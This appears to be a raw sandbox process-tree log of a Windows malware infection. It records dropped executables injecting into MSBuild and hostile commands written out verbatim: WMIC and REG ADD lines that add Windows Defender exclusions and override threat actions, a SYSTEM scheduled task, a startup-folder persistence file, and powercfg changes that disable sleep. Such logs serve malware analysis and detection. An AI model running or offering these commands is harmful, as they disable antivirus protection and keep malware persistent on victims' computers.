C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5420 -prefMapHandle 5400 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca4e5fbe-a66d-42e6-b09b-82214b5bf48d} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:4988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 4 -isForBrowser -prefsHandle 5380 -prefMapHandle 5384 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4fdc6ae-13ab-49a0-9631-1c99653079c5} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:5392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5728 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcacefc3-022c-487a-b661-ab2029c67527} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:5292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 6 -isForBrowser -prefsHandle 2780 -prefMapHandle 3932 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29abb25c-163a-460b-8342-61cbc553c296} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:4476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3764 -childID 7 -isForBrowser -prefsHandle 5692 -prefMapHandle 4532 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 612 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7690758-86e6-441f-8b1a-232546ffc3fd} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" tab10⤵PID:2948
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BAFCFBAEGD.exe"4⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5764
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\XB3ki0WHFBZujbRpDk6IaoK0.exeC:\Users\Admin\Documents\SimpleAdobe\XB3ki0WHFBZujbRpDk6IaoK0.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1088
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5184 -s 22245⤵
- Program crash
PID:4412
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Nbv2eat128G6GNOjYYnBYhR2.exeC:\Users\Admin\Documents\SimpleAdobe\Nbv2eat128G6GNOjYYnBYhR2.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3612 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 22405⤵
- Program crash
PID:6084
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\caCdoHEiuMALDE1JSHligKNP.exeC:\Users\Admin\Documents\SimpleAdobe\caCdoHEiuMALDE1JSHligKNP.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2416 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵PID:5664
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\KAcc9RI3MiOBAHUXgUxfxdaV.exeC:\Users\Admin\Documents\SimpleAdobe\KAcc9RI3MiOBAHUXgUxfxdaV.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\7zS1131.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\7zS1DB4.tmp\Install.exe.\Install.exe /ididWaEmg "385132" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
PID:5236 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:2852
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:5376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "blQxnfAaNNFZMWpemd" /SC once /ST 10:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1DB4.tmp\Install.exe\" XC /poAdidpNm 385132 /S" /V1 /F6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5480
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberPanther.url" & echo URL="C:\Users\Admin\AppData\Local\SecureScope Dynamics\CyberPanther.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberPanther.url" & exit2⤵
- Drops startup file
PID:1928
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2332 -ip 23321⤵PID:5276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3508 -ip 35081⤵PID:5488
-
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exeC:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:456 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:2528
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:4756
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:5728
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:5404
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4996
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:5768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5184 -ip 51841⤵PID:6088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5204 -ip 52041⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\7zS1F6A.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS1F6A.tmp\Install.exe NI /UKhdidZXTP 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:32 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1824
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2416
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4384
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GtOnFDWCCgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GtOnFDWCCgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDENuaOqQISU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDENuaOqQISU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LAYqAmppRtojC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LAYqAmppRtojC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\itCXZnYssICbfHKCXDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\itCXZnYssICbfHKCXDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rZPMEzngU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rZPMEzngU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XKbpoCnULTQzsVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XKbpoCnULTQzsVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WIjQsZOhtuiKSoXd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WIjQsZOhtuiKSoXd\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:323⤵PID:5984
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:324⤵PID:2528
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GtOnFDWCCgUn" /t REG_DWORD /d 0 /reg:643⤵PID:3244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:323⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KDENuaOqQISU2" /t REG_DWORD /d 0 /reg:643⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:323⤵PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LAYqAmppRtojC" /t REG_DWORD /d 0 /reg:643⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:323⤵PID:4332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\itCXZnYssICbfHKCXDR" /t REG_DWORD /d 0 /reg:643⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:323⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rZPMEzngU" /t REG_DWORD /d 0 /reg:643⤵PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\XKbpoCnULTQzsVVB /t REG_DWORD /d 0 /reg:323⤵PID:5376
-
-
